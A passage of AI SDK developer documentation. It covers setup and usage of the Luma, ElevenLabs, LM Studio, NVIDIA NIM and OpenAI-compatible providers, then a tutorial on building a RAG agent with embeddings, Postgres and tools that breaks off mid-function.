    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Luma provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.lumalabs.ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the LUMA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Luma image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { luma } from '@ai-sdk/luma';
import { experimental_generateImage as generateImage } from 'ai';
import fs from 'fs';

const { image } = await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
});

const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Image Model Settings

When creating an image model, you can customize the generation behavior with optional settings:

const model = luma.image('photon-1', {
  maxImagesPerCall: 1, // Maximum number of images to generate per API call
  pollIntervalMillis: 5000, // How often to check for completed images (in ms)
  maxPollAttempts: 10, // Maximum number of polling attempts before timeout
});

Since Luma processes images through an asynchronous queue system, these settings allow you to tune the polling behavior:

maxImagesPerCall number

Override the maximum number of images generated per API call. Defaults to 1.
pollIntervalMillis number

Control how frequently the API is checked for completed images while they are being processed. Defaults to 500ms.
maxPollAttempts number

Limit how long to wait for results before timing out, since image generation is queued asynchronously. Defaults to 120 attempts.

Model Capabilities

Luma offers two main models:

Model	Description
`photon-1`	High-quality image generation with superior prompt understanding
`photon-flash-1`	Faster generation optimized for speed while maintaining quality

Both models support the following aspect ratios:

1:1
3:4
4:3
9:16
16:9 (default)
9:21
21:9

For more details about supported aspect ratios, see the Luma Image Generation documentation.

Key features of Luma models include:

Ultra-high quality image generation
10x higher cost efficiency compared to similar models
Superior prompt understanding and adherence
Unique character consistency capabilities from single reference images
Multi-image reference support for precise style matching

Advanced Options

Luma models support several advanced features through the providerOptions.luma parameter.

Image Reference

Use up to 4 reference images to guide your generation. Useful for creating variations or visualizing complex concepts. Adjust the weight (0-1) to control the influence of reference images.

// Example: Generate a salamander with reference
await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A salamander at dusk in a forest pond, in the style of ukiyo-e',
  providerOptions: {
    luma: {
      image_ref: [
        {
          url: 'https://example.com/reference.jpg',
          weight: 0.85,
        },
      ],
    },
  },
});

Style Reference

Apply specific visual styles to your generations using reference images. Control the style influence using the weight parameter.

// Example: Generate with style reference
await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A blue cream Persian cat launching its website on Vercel',
  providerOptions: {
    luma: {
      style_ref: [
        {
          url: 'https://example.com/style.jpg',
          weight: 0.8,
        },
      ],
    },
  },
});

Character Reference

Create consistent and personalized characters using up to 4 reference images of the same subject. More reference images improve character representation.

// Example: Generate character-based image
await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A woman with a cat riding a broomstick in a forest',
  providerOptions: {
    luma: {
      character_ref: {
        identity0: {
          images: ['https://example.com/character.jpg'],
        },
      },
    },
  },
});

Modify Image

Transform existing images using text prompts. Use the weight parameter to control how closely the result matches the input image (higher weight = closer to input but less creative).

// Example: Modify existing image
await generateImage({
  model: luma.image('photon-1'),
  prompt: 'transform the bike to a boat',
  providerOptions: {
    luma: {
      modify_image_ref: {
        url: 'https://example.com/image.jpg',
        weight: 1.0,
      },
    },
  },
});

For more details about Luma's capabilities and features, visit the Luma Image Generation documentation.

title: ElevenLabs description: Learn how to use the ElevenLabs provider for the AI SDK.

ElevenLabs Provider

The ElevenLabs provider contains language model support for the ElevenLabs transcription API.

Setup

The ElevenLabs provider is available in the @ai-sdk/elevenlabs module. You can install it with

Provider Instance

You can import the default provider instance elevenlabs from @ai-sdk/elevenlabs:

import { elevenlabs } from '@ai-sdk/elevenlabs';

If you need a customized setup, you can import createElevenLabs from @ai-sdk/elevenlabs and create a provider instance with your settings:

import { createElevenLabs } from '@ai-sdk/elevenlabs';

const elevenlabs = createElevenLabs({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the ElevenLabs provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the ELEVENLABS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the ElevenLabs transcription API using the .transcription() factory method.

The first argument is the model id e.g. scribe_v1.

const model = elevenlabs.transcription('scribe_v1');

import { experimental_transcribe as transcribe } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';

const result = await transcribe({
  model: elevenlabs.transcription('scribe_v1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: { elevenlabs: { languageCode: 'en' } },
});

The following provider options are available:

languageCode string

An ISO-639-1 or ISO-639-3 language code corresponding to the language of the audio file. Can sometimes improve transcription performance if known beforehand. Defaults to null, in which case the language is predicted automatically.
tagAudioEvents boolean

Whether to tag audio events like (laughter), (footsteps), etc. in the transcription. Defaults to true.
numSpeakers integer

The maximum amount of speakers talking in the uploaded file. Can help with predicting who speaks when. The maximum amount of speakers that can be predicted is 32. Defaults to null, in which case the amount of speakers is set to the maximum value the model supports.
timestampsGranularity enum

The granularity of the timestamps in the transcription. Defaults to 'word'. Allowed values: 'none', 'word', 'character'.
diarize boolean

Whether to annotate which speaker is currently talking in the uploaded file. Defaults to true.
fileFormat enum

The format of input audio. Defaults to 'other'. Allowed values: 'pcm_s16le_16', 'other'. For 'pcm_s16le_16', the input audio must be 16-bit PCM at a 16kHz sample rate, single channel (mono), and little-endian byte order. Latency will be lower than with passing an encoded waveform.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`scribe_v1`
`scribe_v1_experimental`

title: LM Studio description: Use the LM Studio OpenAI compatible API with the AI SDK.

LM Studio Provider

LM Studio is a user interface for running local models.

It contains an OpenAI compatible API server that you can use with the AI SDK. You can start the local server under the Local Server tab in the LM Studio UI ("Start Server" button).

Setup

The LM Studio provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with

Provider Instance

To use LM Studio, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'http://localhost:1234/v1',
});

Language Models

You can interact with local LLMs in LM Studio using a provider instance. The first argument is the model id, e.g. llama-3.2-1b.

const model = lmstudio('llama-3.2-1b');

To be able to use a model, you need to download it first.

Example

You can use LM Studio language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

const { text } = await generateText({
  model: lmstudio('llama-3.2-1b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  maxRetries: 1, // immediately error if the server is not running
});

LM Studio language models can also be used with streamText.

Embedding Models

You can create models that call the LM Studio embeddings API using the .embedding() factory method.

const model = lmstudio.embedding('text-embedding-nomic-embed-text-v1.5');

Example - Embedding a Single Value

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5'),
  value: 'sunny day at the beach',
});

Example - Embedding Many Values

When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).

The AI SDK provides the embedMany function for this purpose. Similar to embed, you can use it with embeddings models, e.g. lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5') or lmstudio.textEmbeddingModel('text-embedding-bge-small-en-v1.5').

import { createOpenAICompatible } from '@ai-sdk/openai';
import { embedMany } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
  model: lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5'),
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

title: NVIDIA NIM description: Use NVIDIA NIM OpenAI compatible API with the AI SDK.

NVIDIA NIM Provider

NVIDIA NIM provides optimized inference microservices for deploying foundation models. It offers an OpenAI-compatible API that you can use with the AI SDK.

Setup

The NVIDIA NIM provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:

Provider Instance

To use NVIDIA NIM, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

Language Models

You can interact with NIM models using a provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:

const model = nim.chatModel('deepseek-ai/deepseek-r1');

Example - Generate Text

You can use NIM language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const { text, usage, finishReason } = await generateText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Tell me the history of the San Francisco Mission-style burrito.',
});

console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);

Example - Stream Text

NIM language models can also generate text in a streaming fashion with the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const result = streamText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Tell me the history of the Northern White Rhino.',
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log();
console.log('Token usage:', await result.usage);
console.log('Finish reason:', await result.finishReason);

NIM language models can also be used with other AI SDK functions like generateObject and streamObject.

title: OpenAI Compatible Providers description: Use OpenAI compatible providers with the AI SDK.

OpenAI Compatible Providers

You can use the OpenAI Compatible Provider package to use language model providers that implement the OpenAI API.

Below we focus on the general setup and provider instance creation. You can also write a custom provider package leveraging the OpenAI Compatible package.

We provide detailed documentation for the following OpenAI compatible providers:

The general setup and provider instance creation is the same for all of these providers.

Setup

The OpenAI Compatible provider is available via the @ai-sdk/openai-compatible module. You can install it with:

Provider Instance

To use an OpenAI compatible provider, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'provider-name',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

You can use the following optional settings to customize the provider instance:

baseURL string

Set the URL prefix for API calls.
apiKey string

API key for authenticating requests. If specified, adds an Authorization header to request headers with the value Bearer <apiKey>. This will be added before any headers potentially specified in the headers option.
headers Record<string,string>

Optional custom headers to include in requests. These will be added to request headers after any headers potentially added by use of the apiKey option.
queryParams Record<string,string>

Optional custom url query parameters to include in request urls.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create provider models using a provider instance. The first argument is the model id, e.g. model-id.

const model = provider('model-id');

Example

You can use provider language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const provider = createOpenAICompatible({
  name: 'provider-name',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Including model ids for auto-completion

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

type ExampleChatModelIds =
  | 'meta-llama/Llama-3-70b-chat-hf'
  | 'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'
  | (string & {});

type ExampleCompletionModelIds =
  | 'codellama/CodeLlama-34b-Instruct-hf'
  | 'Qwen/Qwen2.5-Coder-32B-Instruct'
  | (string & {});

type ExampleEmbeddingModelIds =
  | 'BAAI/bge-large-en-v1.5'
  | 'bert-base-uncased'
  | (string & {});

const model = createOpenAICompatible<
  ExampleChatModelIds,
  ExampleCompletionModelIds,
  ExampleEmbeddingModelIds
>({
  name: 'example',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.example.com/v1',
});

// Subsequent calls to e.g. `model.chatModel` will auto-complete the model id
// from the list of `ExampleChatModelIds` while still allowing free-form
// strings as well.

const { text } = await generateText({
  model: model.chatModel('meta-llama/Llama-3-70b-chat-hf'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Custom query parameters

Some providers may require custom query parameters. An example is the Azure AI Model Inference API which requires an api-version query parameter.

You can set these via the optional queryParams provider setting. These will be added to all requests made by the provider.

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'provider-name',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  queryParams: {
    'api-version': '1.0.0',
  },
});

For example, with the above configuration, API requests would include the query parameter in the URL like: https://api.provider.com/v1/chat/completions?api-version=1.0.0.

Provider-specific options

The OpenAI Compatible provider supports adding provider-specific options to the request body. These are specified with the providerOptions field in the request body.

For example, if you create a provider instance with the name provider-name, you can add a custom-option field to the request body like this:

const provider = createOpenAICompatible({
  name: 'provider-name',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
  providerOptions: {
    'provider-name': { customOption: 'magic-value' },
  },
});

The request body sent to the provider will include the customOption field with the value magic-value. This gives you an easy way to add provider-specific options to requests without having to modify the provider or AI SDK code.

Custom Metadata Extraction

The OpenAI Compatible provider supports extracting provider-specific metadata from API responses through metadata extractors. These extractors allow you to capture additional information returned by the provider beyond the standard response format.

Metadata extractors receive the raw, unprocessed response data from the provider, giving you complete flexibility to extract any custom fields or experimental features that the provider may include. This is particularly useful when:

Working with providers that include non-standard response fields
Experimenting with beta or preview features
Capturing provider-specific metrics or debugging information
Supporting rapid provider API evolution without SDK changes

Metadata extractors work with both streaming and non-streaming chat completions and consist of two main components:

A function to extract metadata from complete responses
A streaming extractor that can accumulate metadata across chunks in a streaming response

Here's an example metadata extractor that captures both standard and custom provider data:

const myMetadataExtractor: MetadataExtractor = {
  // Process complete, non-streaming responses
  extractMetadata: ({ parsedBody }) => {
    // You have access to the complete raw response
    // Extract any fields the provider includes
    return {
      myProvider: {
        standardUsage: parsedBody.usage,
        experimentalFeatures: parsedBody.beta_features,
        customMetrics: {
          processingTime: parsedBody.server_timing?.total_ms,
          modelVersion: parsedBody.model_version,
          // ... any other provider-specific data
        },
      },
    };
  },

  // Process streaming responses
  createStreamExtractor: () => {
    let accumulatedData = {
      timing: [],
      customFields: {},
    };

    return {
      // Process each chunk's raw data
      processChunk: parsedChunk => {
        if (parsedChunk.server_timing) {
          accumulatedData.timing.push(parsedChunk.server_timing);
        }
        if (parsedChunk.custom_data) {
          Object.assign(accumulatedData.customFields, parsedChunk.custom_data);
        }
      },
      // Build final metadata from accumulated data
      buildMetadata: () => ({
        myProvider: {
          streamTiming: accumulatedData.timing,
          customData: accumulatedData.customFields,
        },
      }),
    };
  },
};

You can provide a metadata extractor when creating your provider instance:

const provider = createOpenAICompatible({
  name: 'my-provider',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  metadataExtractor: myMetadataExtractor,
});

The extracted metadata will be included in the response under the providerMetadata field:

const { text, providerMetadata } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
});

console.log(providerMetadata.myProvider.customMetric);

This allows you to access provider-specific information while maintaining a consistent interface across different providers.

title: RAG Agent description: Learn how to build a RAG Agent with the AI SDK and Next.js tags: [ 'rag', 'chatbot', 'next', 'embeddings', 'database', 'retrieval', 'memory', 'agent', ]

RAG Agent Guide

In this guide, you will learn how to build a retrieval-augmented generation (RAG) agent.

Before we dive in, let's look at what RAG is, and why we would want to use it.

What is RAG?

RAG stands for retrieval augmented generation. In simple terms, RAG is the process of providing a Large Language Model (LLM) with specific information relevant to the prompt.

Why is RAG important?

To illustrate with a basic example, imagine asking the model for your favorite food:

**input**
What is my favorite food?

**generation**
I don't have access to personal information about individuals, including their
favorite foods.

Not surprisingly, the model doesn’t know. But imagine, alongside your prompt, the model received some extra context:

**input**
Respond to the user's prompt using only the provided context.
user prompt: 'What is my favorite food?'
context: user loves chicken nuggets

**generation**
Your favorite food is chicken nuggets!

Embedding

Chunking

All Together Now

By passing the appropriate context and refining the model’s objective, you are able to fully leverage its strengths as a reasoning machine.

Onto the project!

Project Setup

In this project, you will build a agent that will only respond with information that it has within its knowledge base. The agent will be able to both store and retrieve information. This project has many interesting use cases from customer support through to building your own second brain!

This project will use the following stack:

Clone Repo

To reduce the scope of this guide, you will be starting with a repository that already has a few things set up for you:

Drizzle ORM (lib/db) including an initial migration and a script to migrate (db:migrate)
a basic schema for the resources table (this will be for source material)
a Server Action for creating a resource

To get started, clone the starter repository with the following command:

First things first, run the following command to install the project’s dependencies:

Create Database

You will need a Postgres database to complete this tutorial. If you don't have Postgres setup on your local machine you can:

Create a free Postgres database with Vercel (recommended - see instructions below); or
Follow this guide to set it up locally

Setting up Postgres with Vercel

To set up a Postgres instance on your Vercel account:

Go to Vercel.com and make sure you're logged in
Navigate to your team homepage
Click on the Integrations tab
Click Browse Marketplace
Look for the Storage option in the sidebar
Select the Neon option (recommended, but any other PostgreSQL database provider should work)
Click Install, then click Install again in the top right corner
On the "Get Started with Neon" page, click Create Database on the right
Select your region (e.g., Washington, D.C., U.S. East)
Turn off Auth
Click Continue
Name your database (you can use the default name or rename it to something like "RagTutorial")
Click Create in the bottom right corner
After seeing "Database created successfully", click Done
You'll be redirected to your database instance
In the Quick Start section, click Show secrets
Copy the full DATABASE_URL environment variable

Migrate Database

Once you have a Postgres database, you need to add the connection string as an environment secret.

Make a copy of the .env.example file and rename it to .env.

Open the new .env file. You should see an item called DATABASE_URL. Copy in your database connection string after the equals sign.

With that set up, you can now run your first database migration. Run the following command:

Vercel AI Gateway Key

For this guide, you will need a Vercel AI Gateway API key, which gives you access to hundreds of models from different providers with one API key. If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.

Now, open your .env file and add your API Gateway key:

AI_GATEWAY_API_KEY=your-api-key

Replace your-api-key with your actual Vercel AI Gateway API key.

Build

Let’s build a quick task list of what needs to be done:

Create a table in your database to store embeddings
Add logic to chunk and create embeddings when creating resources
Create an agent
Give the agent tools to query / create resources for it’s knowledge base

Create Embeddings Table

Create a new file (lib/db/schema/embeddings.ts) and add the following code:

import { nanoid } from '@/lib/utils';
import { index, pgTable, text, varchar, vector } from 'drizzle-orm/pg-core';
import { resources } from './resources';

export const embeddings = pgTable(
  'embeddings',
  {
    id: varchar('id', { length: 191 })
      .primaryKey()
      .$defaultFn(() => nanoid()),
    resourceId: varchar('resource_id', { length: 191 }).references(
      () => resources.id,
      { onDelete: 'cascade' },
    ),
    content: text('content').notNull(),
    embedding: vector('embedding', { dimensions: 1536 }).notNull(),
  },
  table => ({
    embeddingIndex: index('embeddingIndex').using(
      'hnsw',
      table.embedding.op('vector_cosine_ops'),
    ),
  }),
);

This table has four columns:

id - unique identifier
resourceId - a foreign key relation to the full source material
content - the plain text chunk
embedding - the vector representation of the plain text chunk

To perform similarity search, you also need to include an index (HNSW or IVFFlat) on this column for better performance.

To push this change to the database, run the following command:

Add Embedding Logic

Now that you have a table to store embeddings, it’s time to write the logic to create the embeddings.

Create a file with the following command:

Generate Chunks

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

Install AI SDK

You will use the AI SDK to create embeddings. This will require two more dependencies, which you can install by running the following command:

This will install the AI SDK and the AI SDK's React hooks.

Generate Embeddings

Let’s add a function to generate embeddings. Copy the following code into your lib/ai/embedding.ts file.

import { embedMany } from 'ai';

const embeddingModel = 'openai/text-embedding-ada-002';

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

export const generateEmbeddings = async (
  value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
  const chunks = generateChunks(value);
  const { embeddings } = await embedMany({
    model: embeddingModel,
    values: chunks,
  });
  return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};

In this code, you first define the model you want to use for the embeddings. In this example, you are using OpenAI’s text-embedding-ada-002 embedding model.

Update Server Action

Open the file at lib/actions/resources.ts. This file has one function, createResource, which, as the name implies, allows you to create a resource.

'use server';

import {
  NewResourceParams,
  insertResourceSchema,
  resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';

export const createResource = async (input: NewResourceParams) => {
  try {
    const { content } = insertResourceSchema.parse(input);

    const [resource] = await db
      .insert(resources)
      .values({ content })
      .returning();

    return 'Resource successfully created.';
  } catch (e) {
    if (e instanceof Error)
      return e.message.length > 0 ? e.message : 'Error, please try again.';
  }
};

Update the file with the following code:

'use server';

import {
  NewResourceParams,
  insertResourceSchema,
  resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
import { generateEmbeddings } from '../ai/embedding';
import { embeddings as embeddingsTable } from '../db/schema/embeddings';

export const createResource = async (input: NewResourceParams) => {
  try {
    const { content } = insertResourceSchema.parse(input);

    const [resource] = await db
      .insert(resources)
      .values({ content })
      .returning();

    const embeddings = await generateEmbeddings(content);
    await db.insert(embeddingsTable).values(
      embeddings.map(embedding => ({
        resourceId: resource.id,
        ...embedding,
      })),
    );

    return 'Resource successfully created and embedded.';
  } catch (error) {
    return error instanceof Error && error.message.length > 0
      ? error.message
      : 'Error, please try again.';
  }
};

Create Root Page

Great! Let's build the frontend. The AI SDK’s useChat hook allows you to easily create a conversational user interface for your agent.

Replace your root page (app/page.tsx) with the following code.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      <div className="space-y-4">
        {messages.map(m => (
          <div key={m.id} className="whitespace-pre-wrap">
            <div>
              <div className="font-bold">{m.role}</div>
              {m.parts.map(part => {
                switch (part.type) {
                  case 'text':
                    return <p>{part.text}</p>;
                }
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

The useChat hook enables the streaming of chat messages from your AI provider (you will be using OpenAI via the Vercel AI Gateway), manages the state for chat input, and updates the UI automatically as new messages are received.

Run the following command to start the Next.js dev server:

You can customize the endpoint in the useChat configuration object

Create API Route

Create a file at app/api/chat/route.ts by running the following command:

Open the file and add the following code:

import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser and try to send a message again. You should see a response from the model streamed directly in!

Refining your prompt

While you now have a working agent, it isn't doing anything special.

import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

In its current form, your agent is now, well, useless. How do you give the model the ability to add and query information?

Using Tools

A tool is a function that can be called by the model to perform a specific task. You can think of a tool like a program you give to the model that it can run as and when it deems necessary.

Let’s see how you can create a tool to give the model the ability to create, embed and save a resource to your agents’ knowledge base.

Add Resource Tool

Update your route handler with the following code:

import { createResource } from '@/lib/actions/resources';
import { convertToModelMessages, streamText, tool, UIMessage } from 'ai';
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: convertToModelMessages(messages),
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

In this code, you define a tool called addResource. This tool has three elements:

description: description of the tool that will influence when the tool is picked.
inputSchema: Zod schema that defines the input necessary for the tool to run.
execute: An asynchronous function that is called with the arguments from the tool call.

In simple terms, on each generation, the model will decide whether it should call the tool. If it deems it should call the tool, it will extract the input and then append a new message to the messages array of type tool-call. The AI SDK will then run the execute function with the parameters provided by the tool-call message.

Head back to the browser and tell the model your favorite food. You should see an empty response in the UI. Did anything happen? Let’s see. Run the following command in a new terminal window.

This will start Drizzle Studio where we can view the rows in our database. You should see a new row in both the embeddings and resources table with your favorite food!

Let’s make a few changes in the UI to communicate to the user when a tool has been called. Head back to your root page (app/page.tsx) and add the following code:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      <div className="space-y-4">
        {messages.map(m => (
          <div key={m.id} className="whitespace-pre-wrap">
            <div>
              <div className="font-bold">{m.role}</div>
              {m.parts.map(part => {
                switch (part.type) {
                  case 'text':
                    return <p>{part.text}</p>;
                  case 'tool-addResource':
                  case 'tool-getInformation':
                    return (
                      <p>
                        call{part.state === 'output-available' ? 'ed' : 'ing'}{' '}
                        tool: {part.type}
                        <pre className="my-4 bg-zinc-100 p-2 rounded-sm">
                          {JSON.stringify(part.input, null, 2)}
                        </pre>
                      </p>
                    );
                }
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

Improving UX with Multi-Step Calls

The AI SDK has a feature called stopWhen which allows stopping conditions when the model generates a tool call. If those stopping conditions haven't been hit, the AI SDK will automatically send tool call results back to the model!

Open your root page (api/chat/route.ts) and add the following key to the streamText configuration object:

import { createResource } from '@/lib/actions/resources';
import {
  convertToModelMessages,
  streamText,
  tool,
  UIMessage,
  stepCountIs,
} from 'ai';
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: convertToModelMessages(messages),
    stopWhen: stepCountIs(5),
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser and tell the model your favorite pizza topping (note: pineapple is not an option). You should see a follow-up response from the model confirming the action.

Retrieve Resource Tool

import { embed, embedMany } from 'ai';
import { db } from '../db';
import { cosineDistance, desc, gt, sql } from 'drizzle-orm';
import { embeddings } from '../db/schema/embeddings';

const embeddingModel = 'openai/text-embedding-ada-002';

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

export const generateEmbeddings = async (
  value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
  const chunks = generateChunks(value);
  const { embeddings } = await embedMany({
    model: embeddingModel,
    values: chunks,
  });
  return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};

export const generateEmbedding = async (value: string): Promise<number[]> => {
  const input = value.replaceAll('\\n', ' ');
  const { embedding } = await embed({
    model: embeddingModel,
    value: input,
  });
  return embedding;
};

export const findRelevantContent = async (userQuery: string) => {
